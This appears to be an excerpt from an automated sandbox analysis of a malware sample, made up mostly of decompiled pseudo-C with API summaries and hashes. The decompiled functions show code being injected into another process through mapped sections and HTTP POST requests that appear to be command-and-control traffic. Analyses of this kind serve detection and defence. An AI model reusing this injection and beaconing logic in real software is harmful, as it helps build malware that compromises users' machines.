                  0x0008de9a
                  0x0008de9c
                  0x0008de9d
                  0x0008dea2
                  0x00000000
                  0x0008dea2
                  0x0008ddbe
                  0x0008ddbe
                  0x0008ddc1
                  0x0008de2c
                  0x0008de40
                  0x0008de50
                  0x0008de54
                  0x0008de56
                  0x00000000
                  0x00000000
                  0x0008de5c
                  0x0008de5d
                  0x00000000
                  0x0008de5d
                  0x0008ddc3
                  0x0008ddc3
                  0x0008ddc6
                  0x00000000
                  0x00000000
                  0x0008ddc8
                  0x0008ddcb
                  0x00000000
                  0x00000000
                  0x0008ddcd
                  0x0008ddcd
                  0x0008ddd3
                  0x0008ddef
                  0x0008ddfe
                  0x0008de07
                  0x0008de0c
                  0x0008de0f
                  0x0008de15
                  0x0008de15
                  0x0008de1a
                  0x0008de26
                  0x00000000
                  0x0008de26
                  0x0008ddd8
                  0x00000000
                  0x0008ddd8
                  0x0008dd7b
                  0x0008dda2
                  0x0008dda7
                  0x0008ddac
                  0x0008ddae
                  0x0008ddae
                  0x00000000
                  0x0008ddac
                  0x0008dd7d
                  0x0008dd7d
                  0x0008dd80
                  0x00000000
                  0x00000000
                  0x0008dd86
                  0x0008dd86
                  0x0008dd89
                  0x00000000
                  0x00000000
                  0x0008dd8f
                  0x0008dd8f
                  0x0008dd92
                  0x00000000
                  0x00000000
                  0x0008dd98
                  0x0008dd9b
                  0x00000000
                  0x00000000
                  0x0008dd9d
                  0x00000000
                  0x0008dd9d
                  0x0008dedf
                  0x0008dee5
                  0x0008deeb
                  0x0008deee
                  0x0008def1
                  0x0008def1
                  0x0008def4
                  0x0008def5
                  0x0008def8
                  0x0008defa
                  0x00000000
                  0x00000000
                  0x0008df4a
                  0x0008df4a
                  0x00000000
                  0x0008df4a
                  0x0008dc81
                  0x0008dc87
                  0x00000000
                  0x0008dc87
                  0x0008df47
                  0x00000000
                  0x0008dbca
                  0x0008dbcf
                  0x0008dbd4
                  0x00000000
                  0x0008dbd8

                  APIs
                    • Part of subcall function 0008D523: CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                    • Part of subcall function 0008D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                    • Part of subcall function 0008D523: CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                    • Part of subcall function 0008D523: SysAllocString.OLEAUT32(00000000), ref: 0008D569
                    • Part of subcall function 0008D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • SysAllocString.OLEAUT32(00000000), ref: 0008DBE5
                  • SysAllocString.OLEAUT32(00000000), ref: 0008DBF9
                  • SysFreeString.OLEAUT32(?), ref: 0008DF82
                  • SysFreeString.OLEAUT32(?), ref: 0008DF8B
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                  • String ID: FALSE$TRUE
                  • API String ID: 1290676130-1412513891
                  • Opcode ID: 2e605f16a7bee3e13d6a0837757ba05e1d766071a1216dbb015d656176137527
                  • Instruction ID: 1b20700aac11c4dae470c7e010e7ba276413c48b0cffd0f81d1503e5e528a265
                  • Opcode Fuzzy Hash: 2e605f16a7bee3e13d6a0837757ba05e1d766071a1216dbb015d656176137527
                  • Instruction Fuzzy Hash: 58E15E71E00219AFDF54FFA4C985EEEBBB9FF48310F14815AE545AB292DB31A901CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008C6C0, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 200registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 59%
                  			E0008C6C0(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct HINSTANCE__* _t116;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t139;
				char _t140;
				intOrPtr _t141;

				_t69 =  *0x9e688; // 0xb0000
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E0008E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						_t136 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						_t71 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t71 + 0x20))(_v16);
					}
					return _v8;
				}
				_push(_t116);
				_push(0x8000000);
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				_push(0x40);
				_push( &_v44);
				_push(_t116);
				_push(0xe);
				_push( &_v16);
				_t80 =  *0x9e780; // 0x0
				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				_t139 =  *0x9e780; // 0x0
				_push(0x40);
				_push(0);
				_push(2);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				_push(GetCurrentProcess());
				_push(_v16);
				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_t126 = _v20;
					_push( &_v8);
					_t92 =  *0x9e780; // 0x0
					_push(_t126);
					_push(_v16);
					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
						goto L12;
					}
					_t140 = E00088669( *0x9e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t95 =  *0x9e684; // 0x40f8f0
					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
					_t120 =  *0x9e684; // 0x40f8f0
					_t131 = _t96;
					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E0008861A( &_v32, 0x1ac4);
					_t141 =  *0x9e688; // 0xb0000
					 *0x9e688 = _t131;
					E000886E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E0008C63F(_v12, _v8, _v36);
					 *0x9e688 = _t141;
					goto L14;
				}
			}


































                  0x0008c6c6
                  0x0008c6cd
                  0x0008c6cf
                  0x0008c6d1
                  0x0008c6d3
                  0x0008c6d6
                  0x0008c6d9
                  0x0008c6dc
                  0x0008c6df
                  0x0008c6e2
                  0x0008c6e5
                  0x0008c6ef
                  0x0008c6f2
                  0x0008c6f9
                  0x0008c6fe
                  0x0008c6fe
                  0x0008c704
                  0x0008c706
                  0x0008c70f
                  0x0008c8b5
                  0x0008c8b9
                  0x0008c8be
                  0x0008c8c4
                  0x0008c8c7
                  0x0008c8c7
                  0x0008c8cb
                  0x0008c8d0
                  0x0008c8d5
                  0x0008c8e2
                  0x0008c8e2
                  0x0008c8eb
                  0x0008c8ed
                  0x0008c8f5
                  0x0008c8f5
                  0x0008c8fc
                  0x0008c8fc
                  0x0008c718
                  0x0008c719
                  0x0008c71e
                  0x0008c724
                  0x0008c726
                  0x0008c727
                  0x0008c728
                  0x0008c72d
                  0x0008c72e
                  0x0008c738
                  0x00000000
                  0x00000000
                  0x0008c743
                  0x0008c74d
                  0x0008c757
                  0x0008c75a
                  0x0008c760
                  0x0008c767
                  0x0008c768
                  0x0008c769
                  0x0008c772
                  0x0008c773
                  0x0008c774
                  0x0008c776
                  0x0008c779
                  0x0008c77c
                  0x0008c77f
                  0x0008c782
                  0x0008c78e
                  0x0008c7b0
                  0x0008c7b8
                  0x0008c7bb
                  0x0008c7c6
                  0x0008c7c6
                  0x0008c7b8
                  0x0008c7cc
                  0x0008c7d5
                  0x0008c7d7
                  0x0008c7d8
                  0x0008c7da
                  0x0008c7db
                  0x0008c7dc
                  0x0008c7dd
                  0x0008c7e1
                  0x0008c7e8
                  0x0008c7e9
                  0x0008c7f1
                  0x0008c8b2
                  0x00000000
                  0x0008c7f7
                  0x0008c7f7
                  0x0008c7f9
                  0x0008c7fa
                  0x0008c7ff
                  0x0008c800
                  0x0008c801
                  0x0008c802
                  0x0008c803
                  0x0008c809
                  0x0008c80a
                  0x0008c80f
                  0x0008c810
                  0x0008c818
                  0x00000000
                  0x00000000
                  0x0008c82e
                  0x0008c830
                  0x0008c837
                  0x00000000
                  0x00000000
                  0x0008c848
                  0x0008c84e
                  0x0008c856
                  0x0008c859
                  0x0008c85f
                  0x0008c86f
                  0x0008c87b
                  0x0008c880
                  0x0008c886
                  0x0008c896
                  0x0008c8a2
                  0x0008c8aa
                  0x00000000
                  0x0008c8aa

                  APIs
                  • RegisterClassExA.USER32 ref: 0008C785
                  • CreateWindowExA.USER32 ref: 0008C7B0
                  • DestroyWindow.USER32 ref: 0008C7BB
                  • UnregisterClassA.USER32(?,00000000), ref: 0008C7C6
                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0008C7E2
                  • GetCurrentProcess.KERNEL32(00000000), ref: 0008C8DB
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
                  • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                  • API String ID: 3082384575-2319545179
                  • Opcode ID: f1727252491e073bc0b48fd9dcaf6412e4aa2d6629060b779a89976dd17fed39
                  • Instruction ID: d3e88f71527c21399528f0c4bf061e6e508ee729baa66594f0f525f79852064d
                  • Opcode Fuzzy Hash: f1727252491e073bc0b48fd9dcaf6412e4aa2d6629060b779a89976dd17fed39
                  • Instruction Fuzzy Hash: 49712971900249EFEB10DF95DC49EEEBBB9FB89710F14406AF605A7290DB74AE04CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00085F82, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 104COMMON
                  Download Yara Rule
                  C-Code - Quality: 78%
                  			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				char _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t49;
				int _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq");
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E000885EF();
				_t19 = E0008980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E00088F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x9e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E000895C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E000885C2( &_a8);
							_t53 = _t53 + 1;
						} while (_t53 < 0x2710);
						E00092A5B( *0x9e69c);
						 *_t55 = 0x7c3;
						 *0x9e684 = E0008E1BC(0x9ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E000895E1(0x9ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32);
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E000885D5();
							_v8 = 0;
							_t37 =  *0x9e684; // 0x40f8f0
							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00085E06, 0, 0,  &_v8);
							 *0x9e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E000885D5();
					}
					goto L10;
				}
			}





















                  0x00085f82
                  0x00085f92
                  0x00085f9c
                  0x000860d0
                  0x000860c3
                  0x00000000
                  0x000860c5
                  0x000860d7
                  0x00086098
                  0x00000000
                  0x00086098
                  0x00085fa2
                  0x00085faa
                  0x00085fb1
                  0x00085fb3
                  0x00000000
                  0x00085fc6
                  0x00085fc6
                  0x00085fcc
                  0x00085fd2
                  0x00085fe2
                  0x00085fe7
                  0x00085fef
                  0x00085ff7
                  0x00086013
                  0x00086018
                  0x0008601b
                  0x0008601d
                  0x0008601f
                  0x0008602c
                  0x00086035
                  0x0008603e
                  0x00086043
                  0x00086044
                  0x00086052
                  0x0008605c
                  0x0008606d
                  0x00086072
                  0x00086079
                  0x00086080
                  0x00086083
                  0x0008608f
                  0x00086090
                  0x0008609c
                  0x000860a5
                  0x000860a9
                  0x000860b7
                  0x000860ba
                  0x000860c1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x000860c1
                  0x00086092
                  0x00086097
                  0x00000000
                  0x00085ff7

                  APIs
                  • OutputDebugStringA.KERNEL32(Hello qqq), ref: 00085F92
                  • SetLastError.KERNEL32(000000AA), ref: 000860D7
                    • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                    • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                    • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                  • GetModuleHandleA.KERNEL32(00000000), ref: 00085FCC
                  • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00085FE7
                  • GetLastError.KERNEL32 ref: 00085FEF
                  • memset.MSVCRT ref: 00086013
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00086035
                  • GetFileAttributesW.KERNEL32(00000000), ref: 00086083
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                  • String ID: Hello qqq
                  • API String ID: 1203100507-3610097158
                  • Opcode ID: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                  • Instruction ID: 5d8fc15084eb67a1e967e79224f0c4bd4c543ae9b3caa409572413b5ae1d139a
                  • Opcode Fuzzy Hash: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                  • Instruction Fuzzy Hash: AD31A771900544ABEB64BF30DC49EAF37B8FB81720F10852AF495C6292DF389A49DF21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305COMMON
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E0008E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E000895C7(0x85b);
				_v60 = E000895C7(0xdc9);
				_v56 = E000895C7(0x65d);
				_v52 = E000895C7(0xdd3);
				_t105 = E000895C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E0008C379(_t214));
				_t113 =  *0x9e6a4; // 0x40fe60
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x9e6a4; // 0x40fe60
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x9e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x9e6a4; // 0x40fe60
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x9e6a4; // 0x40fe60
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x9e6a4; // 0x40fe60
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x9e6a4; // 0x40fe60
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x9e6a4; // 0x40fe60
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E0008980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x9e6a4; // 0x40fe60
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E0008980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E000895C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x9e6a4; // 0x40fe60
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0008C379(_t217), _a4, _a8);
										E000885C2( &_v12);
										if(_a24 != 0) {
											E0008980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x9e6a4; // 0x40fe60
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E00089749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x9e6a4; // 0x40fe60
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x9e6a4; // 0x40fe60
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x9e6a4; // 0x40fe60
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x9e6a4; // 0x40fe60
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x9e6a4; // 0x40fe60
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x9e6a4; // 0x40fe60
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x9e6a4; // 0x40fe60
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x9e6a4; // 0x40fe60
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}



































































                  0x0008e671
                  0x0008e683
                  0x0008e68c
                  0x0008e696
                  0x0008e69a
                  0x0008e6ab
                  0x0008e6c2
                  0x0008e6cf
                  0x0008e6dc
                  0x0008e6e9
                  0x0008e6ec
                  0x0008e6f1
                  0x0008e6f6
                  0x0008e6f8
                  0x0008e700
                  0x0008e70b
                  0x0008e712
                  0x0008e71e
                  0x0008e721
                  0x0008e72f
                  0x0008e732
                  0x0008e738
                  0x0008e739
                  0x0008e73b
                  0x0008e744
                  0x0008e745
                  0x0008e74a
                  0x0008e750
                  0x0008e75a
                  0x0008e75c
                  0x0008e761
                  0x0008e761
                  0x0008e770
                  0x0008e77f
                  0x0008e783
                  0x0008e792
                  0x0008e795
                  0x0008e79a
                  0x0008e79e
                  0x0008e7a5
                  0x0008e7ac
                  0x0008e7b4
                  0x0008e7bc
                  0x0008e7c3
                  0x0008e7cb
                  0x0008e7d3
                  0x0008e7da
                  0x0008e7e2
                  0x0008e7ea
                  0x0008e7ff
                  0x0008e80c
                  0x0008e80e
                  0x0008e813
                  0x0008e813
                  0x0008e81a
                  0x0008e82b
                  0x0008e830
                  0x0008e832
                  0x0008e832
                  0x0008e846
                  0x0008e858
                  0x0008e85a
                  0x0008e85d
                  0x0008e862
                  0x0008e862
                  0x0008e869
                  0x0008e878
                  0x0008e87c
                  0x0008e8ba
                  0x0008e8bf
                  0x0008e8c7
                  0x0008e8cc
                  0x0008e8d7
                  0x0008e8dd
                  0x0008e8e7
                  0x0008e8ea
                  0x0008e8f3
                  0x0008e8f8
                  0x0008e8f8
                  0x0008e901
                  0x0008e94a
                  0x0008e94c
                  0x0008e953
                  0x0008e954
                  0x0008e957
                  0x0008e95d
                  0x0008e961
                  0x0008e962
                  0x0008e967
                  0x0008e969
                  0x0008e96f
                  0x0008e984
                  0x0008e98c
                  0x0008e9c1
                  0x0008e9c6
                  0x0008e9cb
                  0x00000000
                  0x0008e9cd
                  0x0008e98e
                  0x0008e990
                  0x0008e990
                  0x0008e999
                  0x0008e99c
                  0x0008e99e
                  0x0008e9a0
                  0x0008e9a6
                  0x0008e9a6
                  0x0008e9ab
                  0x0008e9ad
                  0x0008e9b4
                  0x0008e9b4
                  0x00000000
                  0x0008e9b7
                  0x0008e971
                  0x0008e979
                  0x00000000
                  0x0008e903
                  0x0008e903
                  0x0008e909
                  0x0008e90f
                  0x0008e912
                  0x00000000
                  0x0008e912
                  0x0008e901
                  0x0008e87e
                  0x0008e884
                  0x0008e888
                  0x0008e889
                  0x0008e88e
                  0x0008e890
                  0x0008e896
                  0x0008e8b4
                  0x0008e8b4
                  0x00000000
                  0x0008e8b4
                  0x0008e898
                  0x0008e8a2
                  0x0008e8a4
                  0x0008e8a5
                  0x0008e8aa
                  0x0008e8ac
                  0x0008e8b2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008e86b
                  0x0008e86b
                  0x0008e914
                  0x0008e914
                  0x0008e91a
                  0x0008e91d
                  0x00000000
                  0x0008e91d
                  0x0008e81c
                  0x0008e81c
                  0x0008e91f
                  0x0008e91f
                  0x0008e925
                  0x0008e928
                  0x00000000
                  0x0008e928
                  0x0008e81a
                  0x0008e785
                  0x0008e92a
                  0x0008e92d
                  0x0008e92f
                  0x0008e932
                  0x0008e935
                  0x0008e93e
                  0x0008e943
                  0x00000000
                  0x00000000
                  0x0008e947
                  0x00000000
                  0x0008e947
                  0x0008e754
                  0x00000000

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: memset$ErrorLast
                  • String ID: POST
                  • API String ID: 2570506013-1814004025
                  • Opcode ID: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                  • Instruction ID: ea6434b96816f391ca67125378d8c048189af0a816e14d9e93347baa296bf716
                  • Opcode Fuzzy Hash: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                  • Instruction Fuzzy Hash: 50B13C71900208AFEB55EFA4DC89EAE7BB8FF58310F10406AF545EB291DB749E44CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000916B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 28%
                  			E000916B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}















                  0x000916c1
                  0x000916c8
                  0x000916d1
                  0x000916d5
                  0x00091750
                  0x00000000
                  0x00091752
                  0x000916e3
